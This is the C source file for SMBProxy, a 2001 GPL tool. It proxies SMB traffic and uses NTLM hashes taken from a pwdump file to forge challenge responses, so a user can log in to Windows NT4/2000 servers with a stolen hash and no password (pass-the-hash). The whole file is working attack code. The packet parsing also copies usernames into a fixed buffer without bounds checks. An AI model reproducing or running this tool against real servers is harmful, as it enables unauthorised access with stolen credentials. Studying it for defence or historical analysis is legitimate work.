/* 
   SMBProxy
   Copyright (C) Patrik Karlsson <patrik.karlsson@ixsecurity.com> 2001
   
   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation; either version 2 of the License, or
   (at your option) any later version.
   
   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.
   
   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/

#include "config.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef HAVE_GETOPT_H
#include <getopt.h>
#endif
#include <sys/types.h>
#include <fcntl.h>

#ifdef WIN32
#include <winsock.h>
#include <getopt.h>
#else
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#endif

#include "smbproxy.h"
#include "crypto.h"
#include "constants.h"
#include "util.h"
#include "debug.h"

/*
  Connects to the SMB server

  in: 
  int       : Pointer to filedescriptor of socket
  char*     : IP address of server to connect to

  returns:
  int       : status of connect

*/
int connectClient(int *pClient, char *sIP) {
	
  struct  sockaddr_in my_addr;
  
  my_addr.sin_family = AF_INET;
  my_addr.sin_port = htons(139);
  my_addr.sin_addr.s_addr = inet_addr(sIP);
  
  *pClient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	
  return connect(*pClient, (struct sockaddr *)&my_addr, sizeof(my_addr));
}

void processServerINData(uchar *buf, int nSize, SMBDATA *pData, const ARGS *pArgs) {

  int i=0;
  int nByteCount = 0;

  if ( nSize == -1 ) {
    fprintf(stderr, "ERROR: Recieving server data ...\n");
    exit(1);
  }
    
  if ( buf[OFFSET_COMMAND] == SMB_SETUPANDX && pData->bGotChallenge == 0 &&
       buf[OFFSET_BYTECOUNT] > 0 && nSize > OFFSET_CHALLENGE && pData->nServerOS != WINNT40 ) {
    memcpy(pData->UID, buf+OFFSET_UID, sizeof(pData->UID));
    if ( pData->UID[1] != 0 || pData->UID[0] != 0 ) {

      memset(pData->challenge, 0, sizeof(pData->challenge));
      memcpy(pData->challenge, buf+OFFSET_CHALLENGE, sizeof(pData->challenge));
      pData->bGotChallenge = 1;

      dumpChallenge(pData);

    }

  }

  // Do we have a Protocol Negotiation
  if ( buf[OFFSET_COMMAND] == SMB_NEGPROT ) {

    nByteCount = buf[OFFSET_GUID_SIZE];
    memset(pData->GUID, 0, sizeof(pData->GUID));
    
    if ( buf[OFFSET_PROTOVER] == 5 && buf[OFFSET_SMBNEGPROT_KEYLEN] == 0 )
      pData->nServerOS = WIN2000;
    else
      pData->nServerOS = WINNT40;

    if ( pData->nServerOS == WIN2000 ) {
      if ( pArgs->nLogLevel > 0 )
	fprintf(stdout, "TRACE: Windows 2000 handshake detected\n");
    }
    else {
      if ( pArgs->nLogLevel > 0 )
	fprintf(stdout, "TRACE: Windows NT4.0 handshake detected\n");
      memcpy(pData->challenge, buf+OFFSET_SMBNEGPROT_CHALLENGE, sizeof(pData->challenge));
      pData->bGotChallenge = 1;
    }
    
    // Copy the GUID
    for ( i = 0; i< nByteCount; i++ ) {
      pData->GUID[i] = buf[OFFSET_GUID+i];
    }

  }

}

void processClientINData(uchar *buf, int nSize, SMBDATA *pData, const ARGS *pArgs) {

  int nOffset = 0, i=0;
  int nUserLen = 0, nCompNameLen = 0;
  char username[64];

  memset(username, 0, sizeof(username));

  if ( nSize == -1 || nSize == 0) {
    fprintf(stderr, "ERROR: Recieving server data ...\n");
    exit(1);
  }
    
  // Windows 2000 response
  if ( buf[OFFSET_COMMAND] == SMB_SETUPANDX && 
       pData->nServerOS == WIN2000 &&
       pData->bGotChallenge == 1 &&
       ( buf[OFFSET_UID] != 0 || buf[OFFSET_UID+1] != 0 ) ) {

    nOffset = 150;
    if ( nSize < nOffset ) {
      fprintf(stderr, "ERROR: Packet to small ...\n");
      exit(1);
    }

    // Offset to BLOB add the length, subtract 40 for the hashes
    nOffset = OFFSET_SECURITYBLOB + buf[OFFSET_SECURITYBLOB_LENGTH] - 40;
    nUserLen = buf[OFFSET_SECURITYBLOB+48] - buf[OFFSET_SECURITYBLOB+40];
    nCompNameLen = ( nOffset - 24 - ( OFFSET_SECURITYBLOB + 64 ) - nUserLen ) / 2;

    if ( nUserLen > 0 && pArgs->nLogLevel > 0) 
      fprintf(stdout, "TRACE: User length seems to be : %d\n", nUserLen);

    for ( i=0; i<nUserLen; i+= 2 )
      username[i/2] =  buf[OFFSET_SECURITYBLOB + 64 + nCompNameLen+i];

    if ( nUserLen > 0 && pArgs->nLogLevel > 0)
      fprintf(stdout, "TRACE: User seems to be : %s\n", username);
    
    if ( strlen(username) > 0 && pData->pPWDump != NULL ) {

      if ( pArgs->nLogLevel > 0 ) 
	fprintf(stdout, "TRACE: Fetching hash for user\n");

      if ( getHashForUser(pData->pPWDump, username) != NULL ) {
	memset(pData->NTLMHash, 0, 16);
	translateHash(&pData->NTLMHash, getHashForUser(pData->pPWDump, username));
      }
    }
    
    fprintf(stdout, "INFO: Injecting new response\n");
    
    memset(pData->newNTLMResponse, 0, 24);
    dumpChallenge(pData);
    mkResponse(&pData->newNTLMResponse, pData->NTLMHash, pData->challenge);
    memcpy(buf+nOffset, pData->newNTLMResponse, 24);
    
    pData->bGotChallenge = 0;

  }
  else if ( buf[OFFSET_COMMAND] == SMB_SETUPANDX && 
	    pData->nServerOS == WINNT40 &&
	    pData->bGotChallenge == 1 ) {

    i = 0;
    memset(username, 0, sizeof(username));
    while ( buf[OFFSET_SMBSETUPANDX_USERNAME_WINNT40+i] != 0 ) {
      username[i/2] = buf[OFFSET_SMBSETUPANDX_USERNAME_WINNT40+i];
      i+=2;
    } 

    // 24 byte long hash
    if ( buf[OFFSET_SMBSETUPANDX_ANSIPWLENGTH] == 0x18 ) {

      // should we log
      if ( pArgs->nLogLevel > 0 ) {
	fprintf(stderr, "TRACE: Username seems to be %s\n", username);
	fprintf(stdout, "TRACE: Fetching hash for user: %s\n", 
		getHashForUser(pData->pPWDump, username));
      }

      translateHash(&pData->NTLMHash, getHashForUser(pData->pPWDump, username));
      memset(pData->newNTLMResponse, 0, 24);
      mkResponse(&pData->newNTLMResponse, pData->NTLMHash, pData->challenge);
      memcpy(buf+OFFSET_SMBSETUPANDX_NTLM_RESPONSE, pData->newNTLMResponse, 24);
    }

  }


}

/*
  Check if the socket has any incoming data
  Timeout is set to 100 usec
*/
int isSocketReady(int nFD) {
  
  fd_set rfds;
  struct timeval tv;

  FD_ZERO(&rfds);
  FD_SET(nFD, &rfds);
  
  tv.tv_sec = 0;
  tv.tv_usec = 10;
  
  return select(nFD+1, &rfds, NULL, NULL, &tv);
}


int doProxy(ARGS *pArgs) {

  int serverSocket = 0, fd = 0, clientSocket = 0;
  int nLen, nRead;
  struct sockaddr_in my_addr;
  int nPort = -1, nLoaded = -1;
  uchar buf[1024];
  SMBPACKET *pPacket;
  SMBDATA smbdata;

#ifdef WIN32
	WORD    wVersionRequested = 0;
    WSADATA wsaData;
#endif

  smbdata.NTLMResponse    = (uchar *) malloc(24);
  smbdata.newNTLMResponse = (uchar *) malloc(24);
  smbdata.NTLMHash        = (uchar *) malloc(16);
  smbdata.bGotChallenge   = 0;
  smbdata.pPWDump         = NULL;

  // Should we load a pwdump file ?
  if ( pArgs->pPWDumpFile != NULL )
    nLoaded = loadPWDumpFile(pArgs->pPWDumpFile, &smbdata.pPWDump);

  // we don't have a valid pwdump file
  if ( !nLoaded ) {
    fprintf(stderr, "ERROR: Invalid pwdump file\n");
    exit(1);
  }

  pPacket = (SMBPACKET *) malloc ( sizeof(SMBPACKET) );

  memset(pPacket->GUID, 0, sizeof(pPacket->GUID));
  
  nPort = pArgs->nProxyPort;

  fprintf(stdout, "SMBproxy by Patrik Karlsson <patrik.karlsson@ixsecurity.com>\n");
  fprintf(stdout, "------------------------------------------------------------\n");
  fprintf(stdout, "INFO: Proxy started on ip %s port %d\n", pArgs->listenIP, nPort);
  fprintf(stdout, "INFO: Proxying traffic to %s\n", pArgs->serverIP);

  if ( nLoaded != -1 )
    fprintf(stdout, "INFO: Loaded %d Hashes\n", nLoaded);

  fprintf(stdout, "INFO: Waiting for connection\n");

  // Outer loop
  while (1) {

#ifdef WIN32
	wVersionRequested = MAKEWORD(1, 1);
	WSAStartup(wVersionRequested, &wsaData);
#endif
	  
	serverSocket = socket(AF_INET, SOCK_STREAM, 0);
  
    if ( fd == -1 ) {
      perror("ERROR:");
      exit(1);
    }

    // init my_addr
    memset(&my_addr, 0, sizeof(my_addr));
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(nPort);
    my_addr.sin_addr.s_addr = inet_addr(pArgs->listenIP);
  
    if ( ( bind(serverSocket, (struct sockaddr *)&my_addr, sizeof(my_addr)) ) < 0 ) {
      fprintf(stderr, "ERROR: Binding socket to port %d...\n", nPort);
      perror("ERROR");
      exit(1);
    }


    listen(serverSocket, 1);
    nLen = sizeof(my_addr);

    fd = accept (serverSocket, (struct sockaddr *) &my_addr, &nLen);

    if ( connectClient(&clientSocket, pArgs->serverIP) == -1 ) {
      fprintf(stderr, "ERROR: Connecting to server ...\n");
      exit(1);
    }
  
    fprintf(stdout, "INFO: Got connection\n");
  
    // Inner loop
    while (1) {

      if ( isSocketReady(fd) ) {
	nRead = recv(fd, (char *)buf, sizeof(buf), 0);

	if ( nRead == 0 )
	  break;

	if ( pArgs->nLogLevel > 0 ) {
	  printf("TRACE: REQ SMBCommand seems to be : %X\n", buf[OFFSET_COMMAND]);
	}

	processClientINData((char *)&buf, nRead, &smbdata, pArgs);
	send(clientSocket, (char *)buf, nRead, 0);
      }

      if ( isSocketReady(clientSocket) ) {
	nRead = recv(clientSocket, (char *)buf, sizeof(buf), 0);

	if ( pArgs->nLogLevel > 0 ) {
	  printf("TRACE: RESP SMBCommand seems to be : %X\n", buf[OFFSET_COMMAND]);
	}

	processServerINData(buf, nRead, &smbdata, pArgs);
	send(fd, (char *)buf, nRead, 0);
      }
   
    } // end inner while loop

    close(fd);
    close(clientSocket);
    close(serverSocket);

#ifdef WIN32
	WSACleanup();
#endif
  } // end outer while loop

  free(smbdata.NTLMResponse);
  free(smbdata.newNTLMResponse);
  free(smbdata.NTLMHash);
  freePWDump(smbdata.pPWDump);
  return 0;
}

void initArguments(ARGS *pArgs) {
  memset(pArgs->listenIP, 0, sizeof(pArgs->listenIP));
  memset(pArgs->serverIP, 0, sizeof(pArgs->serverIP));
  strcpy(pArgs->listenIP, "127.0.0.1");
  pArgs->nProxyPort = 139;
  pArgs->nLogLevel = 0;
  pArgs->pPWDumpFile = NULL;
}

void usage(char **argv) {
  printf("SMBproxy %s by patrik.karlsson@ixsecurity.com\n", SMBPROXY_VERSION);
  printf("-------------------------------------------------\n");
  printf("%s [options]\n", argv[0]);
  printf("\t-s* <serverip> to proxy to\n");
  printf("\t-l  <listenip> to listen to\n");
  printf("\t-p  <port> to listen to (139/445)\n");
  printf("\t-f* <pwdumpfile> containing hashes\n");
  printf("\t-v  be verbose\n");
  printf("\t-h  your reading it\n");
  printf("\n\n");
}

int main(int argc, char** argv) {

  int c;
  ARGS args;

  initArguments(&args);

  while (1) {

    c = getopt(argc, argv, "l:s:p:f:v");

    if ( c == -1 ) 
      break;

    switch (c) {
      
    case 'l':
      if ( strlen(optarg) > 15 )
		exit(1);

      strncpy(args.listenIP, optarg, 15);
      break;

    case 'v':
      args.nLogLevel = 1;
      break;

    case 's':
      if ( strlen(optarg) > 15 )
	exit(1);

      strncpy(args.serverIP, optarg, 15);
      break;

    case 'p':
      args.nProxyPort = atoi(optarg);
      break;

    case 'f':
      args.pPWDumpFile = fopen(optarg, "r");
      break;

    default:
      usage(argv);
      exit(1);
    }
  }

  if ( strlen(args.serverIP) == 0 || args.pPWDumpFile == NULL ) {
    usage(argv);
    exit(1);
  }

  return doProxy(&args);

}
